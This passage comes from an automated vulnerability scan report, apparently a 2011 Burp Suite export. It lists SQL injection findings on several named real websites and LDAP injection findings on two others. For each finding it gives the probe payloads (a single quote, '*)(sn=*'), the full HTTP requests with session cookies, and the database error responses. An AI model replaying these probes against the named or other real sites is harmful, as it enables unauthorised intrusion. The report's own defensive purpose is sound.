   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

2.56. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-bootm-bg.jpg?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:06 GMT
Connection: Keep-Alive
Content-Length: 27711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...

2.57. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-bootm-bg.jpg'?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:30 GMT
Connection: Keep-Alive
Content-Length: 27710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...

2.58. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-top-bg.jpg?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:09 GMT
Connection: Keep-Alive
Content-Length: 27709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...

2.59. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-top-bg.jpg'?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:34 GMT
Connection: Keep-Alive
Content-Length: 27708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...

2.60. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/header-background.jpg?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:34 GMT
Connection: Keep-Alive
Content-Length: 27713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...

2.61. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/header-background.jpg'?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:58 GMT
Connection: Keep-Alive
Content-Length: 27712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...

2.62. http://www.nutter.com/attorneys.php [AttorneyID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /attorneys.php

Issue detail

The AttorneyID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AttorneyID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.php?AttorneyID=59' HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/attorneys.php?letter=G
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:15:26 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 9631

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELECT FirstName,LastName,Mid
...[SNIP]...

2.63. http://www.nutter.com/careers.php [CareerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The CareerID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CareerID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /careers.php?CategoryID=22&CareerID=4'&subID=1 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/careers.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:19:42 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 8510

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<div id="mainContent">
   
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1 | 1064<BR>
...[SNIP]...

2.64. http://www.nutter.com/careers.php [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The CategoryID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CategoryID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /careers.php?CategoryID=22'&CareerID=4&subID=1 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/careers.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:18:45 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 17285

<!-- careers start -->

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELEC
...[SNIP]...

2.65. http://www.socialfollow.com/button/image/ [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /button/image/

Issue detail

The b parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the b parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /button/image/?b=1' HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.2.10.1304721456

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:40:55 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 1288
Content-Type: text/html

<br />
<b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b><br />
<b
...[SNIP]...

3. LDAP injection  previous  next
There are 2 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


3.1. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Careers

Issue detail

The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /main/do/*)(sn=* HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:36:26 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=ec8318b7ec9c1aec4cccc43a2cfd61b4; expires=Sun, 08 May 2011 19:36:26 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:36:26 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html
Set-Cookie: TSa27990=3889173c8335cc2b8a01f99c2edb15b1b4d5d0d9198b18674dc443739c5eca85e1bf282b; Path=/

Request 2

GET /main/do/*)!(sn=* HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:36:27 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=fbdf302905adb668a06e8b9c3ffaa68f; expires=Sun, 08 May 2011 19:36:27 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:36:27 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html


3.2. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The LastName parameter appears to be vulnerable to LDAP injection attacks.

The payloads 7cce339ef57f7f63)(sn=* and 7cce339ef57f7f63)!(sn=* were each submitted in the LastName parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=7cce339ef57f7f63)(sn=* HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1837; ZoneId=0

Response 1

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:13:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43380


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
zBiM3mkuwdaUcjKasqgcplVmVdZhZAzO2dvPfee++999577733ujudTif33/8/XGZkAWz2zkrayZ4hgKrIHz9+fB8/Iv7vX/M3nf2mv+5vuL27++n+wd7epzv3ftPZb/NrneOfX+vX5n+pwW/zu3m/85e/gbT4tdyv+tVv82v9gl//J4ummJT5HJ/+ZvTBrzOv8/Nf93/4Nedtu3p09+7V1dV4vl621XI8rRZ3f/93qzpvmhfZ5emsaKv67rtl/kW+XL/M6nacNat3v8ervF3Xy6/q8jNA+N3vZb/73jn9L4RDH6zq6pwgFdUyKxv6e70sPj9hEL/7vfN3q9dvfvd7s5dem1d5sy5bavnp86xpX2SLnBo8mE7ze/ce5uf3H5w/OP/03p2tZvkLF9Us/ywn9H5hvmzr68/O92fZ/jQ73z6fTve397Nstp3Npg+2D3am2YQA7N7L90CO3+y3+XV+wa/d1NNf93e5Wywufn9Cc1Et7/7ePOC7Cxokhjy+KM5/wa+dle2v+xt+D3+nGP33ZzMm6a93/pv+1r/mrzFz5P1dfo05A/61fpdf89f9M36t25P09XoCuP9voajQcXaw8+DhdCfb3p3uzrb3d4mYB59O722fT3b3Hjy49/DeeZb9QtDps3x6f+9BdjAlit/PqeW9KbWczbY/nRHTzqbn9x7uTWWastlMSf+7/FqDdH9ZrhvQ/Xf5tX/d3/h7x7NZquQB2X+t3+y3+fWIuL97nLbTsgDueVOt62ne/IJfr83qi7yd/YJfd1pmTZNbKTiplm3+rt37s36dX+PX/DV+jV/j/6YHP/H8Ovjld3593bT5YnxSlWU+bYl+zfh1Vbf57HnRtL8+mr3Nr5tf7zIr13nz6/7+TfGD/Ne/zGtQ+jcgTFZZnde/PjVB8x/jVvjt1/11f41f49f+tX/t3+A3+B0j8E/0td99Y9+f/F4C9OPNrX7SdPljvxYhy/+Y58d+bfzz69A/yW9mPv918NkmpECU31D/OFueV792qo0/L6tJVhY/yNDeNEeLH/t1ARfd3G5A6CFp7Me/9uYp+DE0/3XQxY2I8HCviuW9vecnZ09//SkJwbrOf73F778kEfg1fo1f8zf4DUAM/P/Xw8T+uvly+6vXvyFzym/yC37d19Nqlf+Gd37xt9eTSVbPC